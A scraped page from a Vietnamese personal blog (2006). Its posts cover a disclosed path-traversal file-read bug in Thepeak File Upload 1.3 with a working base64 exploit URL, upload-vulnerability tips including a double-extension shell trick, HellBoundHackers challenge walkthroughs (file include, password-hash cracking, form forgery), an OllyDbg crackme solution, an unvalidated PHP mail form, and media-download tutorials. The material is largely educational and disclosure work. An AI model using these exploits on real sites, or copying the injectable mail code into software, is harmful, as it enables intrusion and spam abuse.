Download nhạc từ các trang nhạc lớn của Việt Nam

31 Tháng Mười 2006
@ 02:27
Ý kiến [0]
Bug đầu tiên của tôi trên securityfocus
(Tác giả:Phạm Đức Hải)
Hí hí, mấy ngày nay không vào securityfocus.com, hôm nay vào thấy nó đã submit bug của mình report lần trước.
Thepeak File Upload v1.3 : Read file vulneability
Thepeak Index.PHP Source Code Information Disclosure Vulnerability
Mà cả tuần nay không có thời gian đọc thêm về secu.

Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Bảo mật | Hack


31 Tháng Mười 2006
@ 01:59
Ý kiến [0]
Download nhạc tại giaidieu.net
(Tác giả:Phạm Đức Hải)
Trang nhạc Giaidieu.net có nhạc khá phong phú và chất lượng khá tốt.
Để download được nhạc ở đây về bạn vào trang : http://www.guru.net.vn/media.aspx và xem hướng dẫn trong đó.

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Âm nhạc |  Lời bài hát


31 Tháng Mười 2006
@ 09:40
Ý kiến [0]
Test php mail
(Tác giả:Phạm Đức Hải)
Đây là đoạn code để test chức năng send mail khi dùng php:
<html>
<body>

<?php
if (isset($_REQUEST['email']))
//if "email" is filled out, send email
  {
  //send email
  $email = $_REQUEST['email'] ; 
  $to = $_REQUEST['to'] ;
  $subject = $_REQUEST['subject'] ;
  $message = $_REQUEST['message'] ;
  mail( $to, "Subject: $subject",$message, "From: $email" );
  echo "Thank you for using our mail form";
  }
else
//if "email" is not filled out, display the form
  {
  echo "<form method='post' action='phpmail.php'>
  Email nguoi gui: <input name='email' type='text' /><br />
  Email nguoi nhan: <input name='to' type='text' /><br />
  Subject: <input name='subject' type='text' /><br />
  Message:<br />
  <textarea name='message' rows='15' cols='40'>
  </textarea><br />
  <input type='submit' />
  </form>";
  }
?>

</body>
</html>

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: PHP


30 Tháng Mười 2006
@ 07:58
Ý kiến [0]
Some examples of using Unix find command.
(Tác giả:Phạm Đức Hải)
Nguồn : Some examples of using UNIX find command.
Introduction

The find command allows the Unix user to process a set of files and/or directories in a file subtree.

You can specify the following:

  • where to search (pathname)
  • what type of file to search for (-type: directories, data files, links)
  • how to process the files (-exec: run a process against a selected file)
  • the name of the file(s) (-name)
  • perform logical operations on selections (-o and -a)
Search for file with a specific name in a set of files (-name)
find . -name "rc.conf" -print

This command will search in the current directory and all sub directories for a file named rc.conf.

Note: The -print option will print out the path of any file that is found with that name. In general -print wil print out the path of any file that meets the find criteria.

How to apply a unix command to a set of file (-exec).
find . -name "rc.conf" -exec chmod o+r '{}' \;

This command will search in the current directory and all sub directories. All files named rc.conf will be processed by the chmod -o+r command. The argument '{}' inserts each found file into the chmod command line. The \; argument indicates the exec command line has ended.

The end results of this command is all rc.conf files have the other permissions set to read access (if the operator is the owner of the file).

How to apply a complex selection of files (-o and -a).
find /usr/src -not \( -name "*,v" -o -name ".*,v" \) '{}' \; -print

This command will search in the /usr/src directory and all sub directories. All files that are of the form '*,v' and '.*,v' are excluded. Important arguments to note are:

  • -not means the negation of the expression that follows
  • \( means the start of a complex expression.
  • \) means the end of a complex expression.
  • -o means a logical or of a complex expression.
    In this case the complex expression is all files like '*,v' or '.*,v'

The above example is shows how to select all file that are not part of the RCS system. This is important when you want go through a source tree and modify all the source files... but ... you don't want to affect the RCS version control files.

How to search for a string in a selection of files (-exec grep ...).
find . -exec grep "www.ajaxviet.com" '{}' \; -print

This command will search in the current directory and all sub directories. All files that contain the string will have their path printed to standard output.

If you want to just find each file then pass it on for processing use the -q grep option. This finds the first occurrance of the search string. It then signals success to find and find continues searching for more files.

find . -exec grep -q "www.ajaxviet.com" '{}' \; -print

This command is very important for process a series of files that contain a specific string. You can then process each file appropriately. An example is find all html files with the string "www.athabascau.ca". You can then process the files with a sed script to change those occurrances of "www.athabascau.ca" with "intra.athabascau.ca".


Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Linux


30 Tháng Mười 2006
@ 06:39
Ý kiến [0]
Nâng cấp blog lên 1.9
(Tác giả:Phạm Đức Hải)
Nâng cấp blog lên 1.9 rồi happy
Bản này khắc phục được khá nhiều lỗi và có thêm các chức năng mới.
Bây giờ mệt rồi, để hôm sau nói rõ hơn vậy.
Mệt đứt hơi !!!

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Linh tinh


27 Tháng Mười 2006
@ 09:38
Ý kiến [0]
Download báo giấy trực tuyến docbao.com.vn
(Tác giả:Phạm Đức Hải)
Ngày hôm qua, một người bạn gửi cho tôi link trang báo giấy trực tuyến docbao.com.vn.
Trang này quét tất cả báo giấy đưa lên mạng, chủng loại khá phong phú, người bạn đó nói rất thích download báo ở đó, download theo số để mang về nhà đọc happy và nói thêm nhiều người cũng thích như thế.
Để đáp lại sự nhiệt tình của bạn, tôi đã bổ xung chức năng download báo giấy trực tuyến vào chương trình Media Downloader. Hy vọng các bạn sẽ có những số báo mình thích.

Các bạn có thể tham khảo và sử dụng tại đây và đừng quên quảng cáo cho bạn bè nhé !

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Âm nhạc | Bạn bè - Người thân | Giải trí


26 Tháng Mười 2006
@ 02:06
Ý kiến [0]
Media Downloader thêm trang Bennhac.com
(Tác giả:Phạm Đức Hải)
Bennhac.com là một trang nghe nhạc với số lượng bài khá lớn trên 15.000 bài hát,hất lượng nghe tốt.
Media Downloader chính thức thêm trang Bennhac.com vào chương trình. Hy vọng các bạn sẽ download được các bài hát mình thích.
Chúc vui happy !

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Âm nhạc |  Lời bài hát | Giải trí


25 Tháng Mười 2006
@ 03:19
Ý kiến [0]
Ra mắt Media Downloader - Beta 1
(Tác giả:Phạm Đức Hải)
Nhằm đáp lại sự nhiệt tình của người yêu nhạc, hôm nay tôi cho ra mắt bản Media Downloader - Beta 1 tại địa chỉ http://media.ajaxviet.com.
Phiên bản này cho phép lấy link download file nhạc của 3 site lớn tại Việt nam :
Trong thời gian tới tôi sẽ cập nhật một số site khác, tôi rất mong các bạn đóng góp ý kiến để tôi có thể hoàn thiện sản phẩm này.
Đọc chi tiết ...

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Âm nhạc |  Lời bài hát | Giải trí | Website


24 Tháng Mười 2006
@ 03:10
Ý kiến [0]
Các lỗi có thể có với upload file
(Tác giả:Phạm Đức Hải)
Hiện nay bất kỳ 1 web site nào cũng biên tập 1 cách trực tuyến WYSIWYG, không giống như ngày trước việc nhập dữ liệu được thực hiện chủ yếu qua 1 chương trình client kết nối với database, viết bằng VB chẳng hạn và nhập qua FTP. Khi biên tập WYSIWYG thì một phần gần như không thể thiếu là upload file.
Dưới góc độ bảo mật tôi xin đưa ra các lỗi nguy hiểm có thể gặp phải với upload file :

- Đầu tiên, ở góc độ lập trình : rất nhiều lập trình viên không ý thức được sự nguy hiểm của phần upload file nên họ sẽ rất dễ mắc phải các lỗi sau :
  • Phần upload file không chứng thực --> ai cũng có thể upload file.
  • Không filter các loại file cho phép upload, hoặc có filter nhưng vẫn gặp lỗi (tôi sẽ nói sau) -->attacker dễ dàng upload các file nguy hiểm như : .php, .asp,.pl,... Phải filter theo kiểu chỉ cho phép các file được upload, chứ không nên theo kiều cấm các các file nguy hiểm- vì nó nhiều, hoặc phát sinh.
  • Sử dụng mặc định các bộ soạn thảo trực quan (WYSIWYG) như FCK Editor, HTMLArea, FreeTextBox,... thậm trí là không xóa cả ví dụ mẫu, tiềm ẩn trong các phần mềm này có rất nhiều lỗi cho phép upload file. Việc cài mặc định giúp attacker dễ dàng định vị hoặc đoán được vị trí của file bị lỗi. VD : trong FCk có file test.html có thể upload file được. Lỗi này tôi cá là bất kỳ lập trình viên nào nếu đã từng viết phần upload file cũng mắc phải, vì chỉ chú ý xem nó có chạy hay không big grin.
  • Nhầm tưởng writeable là 777 --> thật ngớ ngẩn sad
  • Không đổi tên file upload, hoặc có đổi nhưng dễ đoán. Cái này bạn đừng nghĩ là vớ vẩn, vì 1 trong các cái attacker có thể chạy được file upload lên là họ phải biết vị trí file upload lên nằm ở chỗ nào.
- Đối với quản trị website : nhiều khi các admin không phải là người code, họ sử dụng phần mềm do người khác viết. Các lỗi khi sử dụng phần mềm có upload :
  • Không config filter file, hoặc config sai.
  • Đặt quyền không đúng cho các thư mục được upload file (có quyền ghi). Phải đặt theo nguyên tắc : có quyền ghi thì không có quyền chạy, chạy thì không ghi. Thông thường admin hay đánh đồng 777 với ghi (trên *nix), trên wins thì vẫn để toàn quyền đối với thư mục đã có quyền ghi.
- Lỗi sau đây thường cả coder và admin đều không biết hoặc không để ý, lỗi này thì attacker rất thích, tôi cũng thích big grin. Đối với các server chạy apache thì nó sẽ có vấn đề với file extension. Chẳng hạn bạn khai báo một số extenion : php, jpg, bmp, png nhưng trong khi site của bạn là 1 site giải trí cho phép cả các file .swf, .mp3,.wav, ... điều gì sẽ xảy ra nếu attacker upload 1 file như sau : test.php.mp3 --> cái hay ở chỗ này đấy. Apache nó không hiểu extension .mp3 --> nó sẽ đối xử file trên như 1 file php, file php trên là 1 con shell chẳng hạn --> thế là site đã hy sinh rồi đấy.

Hy vọng với bài viết nhỏ này bạn sẽ tìm được cái gì đó cho riêng mình, bạn nào có bổ xung thêm gì thì tôi sẽ rất vui đấy happy.

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Bảo mật | Hack


24 Tháng Mười 2006
@ 02:15
Ý kiến [0]
PHP File Include
(Tác giả:Phạm Đức Hải)
PHP File Include - Phát hiện, khai thác và khắc phục (Bài viết của Guanyu - Mod HVA 2003)
Bài viết này tuy đã lâu rồi, nhưng hiện nay lỗi này vẫn còn khá phổ biến, nên tôi post lại bài này.
Bài này thực sự có ích cho những lập trình viên sử dụng PHP, thông thường những lập trình viên nếu có chú ý đến bảo mật thì cũng chỉ chủ yếu xử lí SQL Injection mà không biết đến cái gọi là PHP injection.
Đây cũng là 1 lỗi rất phổ biến mà hacker khai thác ở mức web application.

Bài viết này là một bài tổng kết lại quá trình tìm hiểu lỗi PHP File Include. Có thể nó hơi khó hiểu, nhưng mình hi vọng các bạn có thể định nghĩa rõ hơn về lỗi này cũng như tự mình có thể phát hiện lổi trong các sản phẩn PHP. Xin nói thâm là các đánh giá dưới đây là theo góc nhìn của QVT chứ không phải đánh giá của bất kì hệ thống nào.

|---------------------------------
Mức độ phổ thông: 5-6
Mức độ nguy hiểm: 7-9
Mục tiêu tấn công: Server
Vị trí kẻ tấn công: Client
---------------------------------|
Đọc chi tiết ...

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Bài viết hay | Bảo mật | Hack


24 Tháng Mười 2006
@ 09:55
Ý kiến [0]
http://tintuc.ajaxviet.com
(Tác giả:Phạm Đức Hải)
Ra mắt trang tin tức http://tintuc.ajaxviet.com hoặc http://tintonghop.be
Trang này ra đời như 1 minh chứng cho bài viết về thế giới tin.
Chiều tối qua xem lại các comment, có hứng viết luôn ra trang này happy.
Chất lượng chưa được tốt vì tôi chưa làm cache, hơn nữa server cũng hơi chậm.
Tôi đã test ở client tốc độ chạy cực nhanh big grin.
Đọc chi tiết ...

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Ajax | Giải trí | Website


23 Tháng Mười 2006
@ 03:24
Ý kiến [0]
Hướng dẫn download phim từ VTC - Mới
(Tác giả:Phạm Đức Hải)
Cập nhật : 15/06/2007 (download theo link)
http://www.guru.net.vn/media.aspx

Trong thời gian qua,qua log Internet Searches tôi thấy vẫn có rất nhiều bạn tìm cách download phim từ VTC, nên tôi quyết định viết bài này.
Cách download phim đối với website VTC cũ bạn có thể tham khảo tại đây.
Mặc dù VTC mới làm lại nhưng vẫn chưa hoàn thiện, cho nên tôi chỉ hướng dẫn cách download thủ công chứ không viết hẳn 1 chương trình giống như download nhạc số, khi nào VTC hoàn thiện tôi sẽ làm như vậy happy.
Nói thêm là : bản website VTC mới này dùng rất bất tiện, và có nhiều lỗi.
Mà down về xem cho ổn định chứ xem trực tiếp trên đó thì đứt mạng 1 phát thì lại phải xem từ đầu, chẳng thể chỉnh được cái gì --> quá bất tiện. Mà không hiểu sao họ ko để luôn link để download nhỉ ?
Công cụ : Trình duyệt IE, Flashget
Các bước tiến hành :

Bạn sử dụng trình duyệt IE mở trang http://www.vtc.com.vn chọn phim cần xem, bấm vào nó để nó hiện lên trên màn hình TV:
vtc1.JPG

Bạn bấm chuột phải vào màn hình TV không thấy phản ứng gì, lúc này bạn đưa chuột qua và thấy có dòng chữ : "Click to activate and use this control"
vtc2.JPG

Sau đó bạn click chuột trái 1 phát vào màn hình, ok ?
Sau đó bạn click lại chuột phải xem nào ? Nó sẽ hiện ra 1 popup --> bạn chọn Properties --> nó sẽ hiện ra của sổ Properties bạn sẽ nhìn thấy ở đó có 1 cái link dạng :
http://www.vtc.com.vn/news/chuongtrinhvtc2/phimtruyen/detail2200.asx
Bạn chạy link này sẽ nhận được URL thực của phim :
mms://mail.vtc.com.vn:8090/VtcPortal_1445/phimnnanhhunghiepnghia.wmv
Tuy nhiên link này vẫn chưa download được (cái này giống bản VTC cũ ), bạn cần đổi :
mms --> rtsp vì VTC dùng media server, với rtsp protocol :
RTSP/1.0
Server: WMServer/9.1.1.3814
sẽ nhận được
rtsp://mail.vtc.com.vn:8090/VtcPortal_1445/phimnnanhhunghiepnghia.wmv
Hoặc bạn có thể đổi mms thành http cũng được, tôi khuyên bạn nên dùng rtsp.
Sau đó bạn dùng Flashget để download phim về.
Có gì thắc mặc bạn có thể liên hệ với tôi. ;-)
Chúc các bạn vui vẻ !

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Âm nhạc | Giải trí | Phim ảnh | Website


20 Tháng Mười 2006
@ 08:04
Ý kiến [0]
DasBlog 1.9 Released : new features
(Tác giả:Phạm Đức Hải)

Phiên bản Dasblog 1.9.6264.0 đã có, một điều đặc biệt trong phiên bản này là có tiếng Việt.
 Scott Hanselman đã tích hợp bản tiếng Việt do Phạm Đức Hải việt hóa vào trong hệ thống, đặc biệt nữa là sẽ có culture vi-vn trong phiên bản này, nên toàn bộ ngày giờ sẽ được chuyển sang Tiếng Việt.
Phiên bản tiếng Việt do tôi việt hóa chưa được hoàn thiện lắm nếu bạn nào có thể làm tốt hơn hãy liên hệ
với tôi nhé !
Download bản Dasblog 1.9.6264.0 tại đây :
download here: 1.9.6264.0
Thanks Scott !!!

Here's some of the new features.

  • Much better multi-user/blogger support including a Top Posters macro and total comments - from Christoph De Baene
  • TagCloud Support - from Scott
  • Support for Mobile Browsers like Blackberries and SmartPhones - from Scott
    • Note the large section in your web.config and the mobile theme that is required for this support.
  • Huge (100x+) speedup in Macro execution - from Scott
  • Support for If-Not-Modified to speed up execution, improve RSS bandwidth and CPU cycles - from Scott
  • Direct Feedburner Support with 301 redirection for RSS and Atom feeds. Don't lose a single subscriber. We're the only blog with direct support for Feedburner and Feedflare I believe. - from Scott
    • I encourage you to check out FeedBurner. You can add FeedFlare to your posts, and modify your feed in ways DasBlog can't. They also handle your Feed bandwidth and provide rich statistics. It's free ($ for advanced stats) and it's very powerful. Do be aware that when you make the decision to move over to FeedBurner your existing feeds will start redirecting folks to FeedBurner immediately. That's part of the power of the whole thing, but be warned.
  • Delete comments directly from your mail reader - from Omar
  • Comment moderation option
  • New themes out of the box, 18 at last count - from Many Folks
  • New XML-RPC support for newMediaObject and new version of XML-RPC.NET from Charles Cook - from Omar and Giuseppe Dipietro
  • Macros for Next Post and Previous Post - Justice Gray
    • Check the DasBlog theme or add this line to the top of your itemtemplate.blogtemplate.
      <%PreviousLink("&laquo;&nbsp;",25)%><%MainPageEntryLink("Main", "|")%><%NextLink("&nbsp;&raquo;",25)%><br/>
  • A few security and XSS fixes
  • Support for Gravatars, images of your choosing that appear next to your comments - John Forsythe
  • Support for limited HTML markup in comments
  • Emails removed to avoid having email addresses stolen from Feeds
  • Added an Email page for leaving comments to the author, includes Captcha
  • New support for RSD so client software can autoconfigure itself - from Omar
  • Pluggable Rich Text Editor, choose from the latest version of FreeTextBox or FCKEditor or write your own adapter - from Josh Flanagan
  • Support for alternate SMTP ports
  • We work with Windows Live Writer out of the box - from Omar
  • Support for CoComment - from Scott
  • Microsummary support for Firefox 2.0 Beta - from Scott
  • Organized source, build, and packing for clarity - from Josh Flanagan
  • New Feed Icons - from Omar
  • Autometic generation of Google SiteMaps - from Scott
  • Automatic disabling of Comments after a certain number of days. Also manual "close comments" support - from Omar
  • ContentLookAhead show future dated posts - from Josh Flanagan
  • Other fixes and suggestions from Tomas Restrepo, Jason Follas, Rene Lebherz and Steven Rockarts. Added entry CPU usage optimizatons from George V. Reilly.
  • Ajax Autosave Drafts support from Steven Rockarts and Justice Gray.
  • Better strings and support for German from Alexander Groß, Portuguese from Adelino Araújo, and Vietnamese from Phạm Đức Hải.
  • Many great new themes
  • Updated readme.rtf from Tim Sherill
  • Single-handed support of DasBlog.info and DasBlog.us to the enthusiastic and tireless Tom Watts!
  • Welcome to new team members Alexander Groß, Paul Van Brenck, and John Forsythe who really did a lot of work to make this release possible! Thanks to Jacob Proffitt for doing some crazy debugging of caching on FireFox that will be in a point release soon.
  • New DasBlog Badges/Artwork from Alexander Groß...download them here: File Attachment: DasBlog Artwork.zip (1015 KB)


Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Blog |  CSharp | Ajax | Mã nguồn mở | Việt hóa | Website


19 Tháng Mười 2006
@ 05:17
Ý kiến [0]
Application Cracking 1
(Tác giả:Phạm Đức Hải)
Application Cracking 1
Description: Find the Password.
Difficulty: easy
Win (.zip)

Công cụ : OllyDbg bạn down về giải nén ra và dùng happy + Hướng dẫn chung

Tiến hành :
Bước 1: Chạy thử file app1.exe xem thế nào. (Sau đó tắt đi)
Bước 2 : Mở OllyDbg và load file app1.exe lên --> nó không báo lỗi gì là ok.
Có thể làm tiếp bước sau.
Bước 3 : Tìm pass, bài này là tìm pass mà.
Trong OllyDbg bấm Alt+E hoặc bấm biểu tượng chữ E trên Menu nó sẽ hiện ra ô "Executable Modules" trong của sổ đó bạn sẽ nhìn thấy cái ứng dụng của chúng ta trong đó.
Bạn nhấn chuột để chọn ứng dụng của chúng ta, sau đó bạn bấm Ctrl+N hoặc chuột phải chọn "View Names". Cái này sẽ cho ta 1 số thông tin hữu ích.
Bạn sẽ tìm thấy dòng sau :

Names in app1, item 42  Address=0040104C  Section=.text  Type=Import Name=MSVBVM60.__vbaStrCmp

Ứng dụng này được viết bằng VB và sử dụng hàm vbaStrCmp để so sánh password.
Bạn cần set breakpoint cho địa chỉ của hàm này, để làm việc đó bạn bấm chuột phải và chọn "Toggle breakpoint" hoặc bấm F2.
Tốt rồi, bây giờ bạn bấm F9 để chạy chương trình. Bạn nhập vào 1 pass bất kỳ, ví dụ ở đây tôi nhập "123456" --> bấm Ok.
Lúc này Breakpoint bên OllyDbg đã hoạt động. Trong cửa sổ con thứ tư của của sổ CPU bạn sẽ nhận thấy có các dòng sau :

0012F3E8   00403F22  RETURN to app1.00403F22 from MSVBVM60.__vbaStrCmp
0012F3EC   0040380C  UNICODE "g7*2+'&1,3"
0012F3F0   0015578C  UNICODE "1234567"

Hàm vbaStrCmp so sánh 2 mật khẩu đó happy --> mật khẩu là : g7*2+'&1,3 --> ok, xong rồi , bạn nhập vào ứng dụng cần crack app1.exe nó sẽ cho bạn mật khẩu nhập vào HBH.
Không có gì phức tạp đúng ko nào ?

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


19 Tháng Mười 2006
@ 04:42
Ý kiến [0]
HBH : Application Challenges
(Tác giả:Phạm Đức Hải)
Tiếp theo phần Basic web hacking, tôi định post phần Javascript Hacking nhưng dạo này đang có hứng Cracking nên sẽ post loạt bài về crack tutorial trước happy
Tất cả các bài viết của tôi nhằm mục đích học hỏi, trao đổi kinh nghiệm, ngoài ra không có mục đích gì khác.
Để có thể vượt qua các Application Challenges tại hellboundhackers.org các công cụ cần có là :
  1. OllyDbg : 1 công cụ debug tuyệt hảo, chạy luôn trên wins ko cần cài cắm gì cả, không giống SoftIce, nên sẽ không cần phải "khổ nhục" cài lại máy mỗi lần crack như trước big grin
  2. Hex Editor : cái này thì nhiều lắm, dùng XVI32 khá hay và tiện dụng, hoặc dùng HIEW cũng được
  3. Ngoài ra còn 1 số công cụ khác tôi sẽ nói cụ thể trong từng bài.
Đó là tất cả các công cụ bạn cần để có thể vượt qua các app challenges.

Về kiến thức : bạn không cần biết nhiều lắm cũng có thể vượt qua tất cả các Challenges này. Nhưng tối thiểu bạn phải có những điều sau :
  1. Biết lập trình 1 ngôn ngữ nào đó
  2. Biết sử dụng các công cụ tôi đã giới thiệu
  3. Một chút tư duy happy
Giới thiệu thế đủ rồi, tôi bắt đầu nhé !

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:30
Ý kiến [0]
All Basic Web Hacking
(Tác giả:Phạm Đức Hải)
Basic Web Hacking (hellboundhackers.org)
Xong rồi ! List các bài đây:
Basic Web Hacking 1
Basic Web Hacking 2
Basic Web Hacking 3
Basic Web Hacking 4
Basic Web Hacking 5
Basic Web Hacking 6
Basic Web Hacking 7
Basic Web Hacking 8
Basic Web Hacking 9
Basic Web Hacking 10
Basic Web Hacking 11
Basic Web Hacking 12
Basic Web Hacking 13
Basic Web Hacking 14
asic Web Hacking 15-16


Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:27
Ý kiến [0]
Basic Web Hacking 15 -16
(Tác giả:Phạm Đức Hải)
hellboundhackers : Basic Web Hacking 15
Yêu cầu : robots.txt là gì ?
Desc :
For this mission you will need to find a secret file using a common technique to find hidden directories.

robots.txt là gì ?
Bạn tìm hiểu xong sẽ biết cách làm bài này thế nào.
Bài này ngắn quá, tiện thể nói luôn bài 16 vì bài 16 cung ngắn.
Basic Web Hacking 16
Yêu cầu : SQL Inject

Cái này y hệt cái Second form của bài 7

Mấy bài cuối này đơn giản phải ko nào ?


Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:21
Ý kiến [0]
Basic Web Hacking 14
(Tác giả:Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 14
Yêu cầu : HTML

Bài này mới fix lại nhưng rất dễ.
View source :
<!-- ADMINS: Check /newpasswd/admin.txt for the new password. --!>
bạn thấy link pass rồi chứ ?
Get it --> get point happy


Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:18
Ý kiến [0]
Basic Web Hacking 13
(Tác giả:Phạm Đức Hải)
Post 1 hồi thấy mệt quá, cố lên sắp hết basic web rồi!
Bài này khá dễ happy
hellboundhackers: Basic Web Hacking 13
Yêu cầu : HTML, form submit
Desc :
Login as George!

Ở đây yêu cầu login với user George, nhưng trong list lại không có. Làm thế nào để có thể submit với user này.
Save page as ...
Sửa lại tí tẹo :
<form method="post" action="http://www.hellboundhackers.org/challenges/basic13/index.php">
<select name="name">
    <option value="Frank">Frank    </option>
    <option value="Johnny">Johnny   </option>
    <option value="Anna">Anna   </option>
    <option value="Jessica">Jessica</option>
    <option value="George">George</option>
</select>

Chú ý thay đổi dòng mày hồng, thêm vào dòng mày đỏ.
Chạy file vừa sửa --> more point!


Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 10:09
Ý kiến [0]
Basic Web Hacking 12
(Tác giả:Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 12
Yêu cầu : biết về .htaccess, php file include, biết sử dụng John the Ripper
Desc :
Find the password for the protected folder and then access it!
Protected Folder

.htaccess là gì ? --> bạn cần biết cái này (google nhé)
Sau đó chú ý đến cái này:
http://www.hellboundhackers.org/challenges/basic12/index.php?page=challenges.php
đặc biệt là cái : page=challenges.php (vớ dc cái này là dân hack khoái lắm big grin)
lại chú ý đến cái Protected Folder :
http://www.hellboundhackers.org/challenges/basic12/protected/
vậy bạn có ý tưởng nào chưa ?
bạn thử thay đổi tham số page xem sao ?
page=protected/....  chỗ .... là cái mà tôi bảo bạn tìm hiểu đó happy
Lưu ý : /protected/ khác với protected/ đấy nhé !
Sau đó nhận được thông tin mới và áp dụng cách như trên.
Cuối cùng sẽ nhận được :
xxxx:1Gwn39lwmRu9U (chỗ xxx tôi dấu đi rồi, hì hì) --> cái này là pass đã mã hóa bằng DES của *unix
Sau đó lưu cái đó vào 1 file hbh.txt chẳng hạn.

Bây giờ bạn cần biết 1 chút về John the Ripper --> đây là chương trình crack pass rất tuyệt happy
Chạy John với wordlist của Cain
>john -w:Wordlist.txt hbh.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
.......................
Sau đó bạn sẽ nhận được pass bạn cần.

Càng ngày các bài càng hay, đúng ko nào ?

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:54
Ý kiến [0]
Basic Web Hacking 11
(Tác giả:Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 11
Yêu cầu : Agent là gì ?
Desc :

Access Denied
You are not allowed to see this page for one or both of the following reasons:

    * This page can only be viewed using the Operating System "HellBoundHackersOS"
    * Your User Agent must be "Mozilla" which is the main browser for the OS.

google for more info about Agent.
Cái này gần giống lv 3 : link
Instal : User Agent Switcher
https://addons.mozilla.org/firefox/59/
Change agent : Mozilla (HellBoundHackersOS)

--> Refresh --> Finish!

Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it!
Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:48
Ý kiến [0]
Basic Web Hacking 10
(Tác giả:Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 10
Y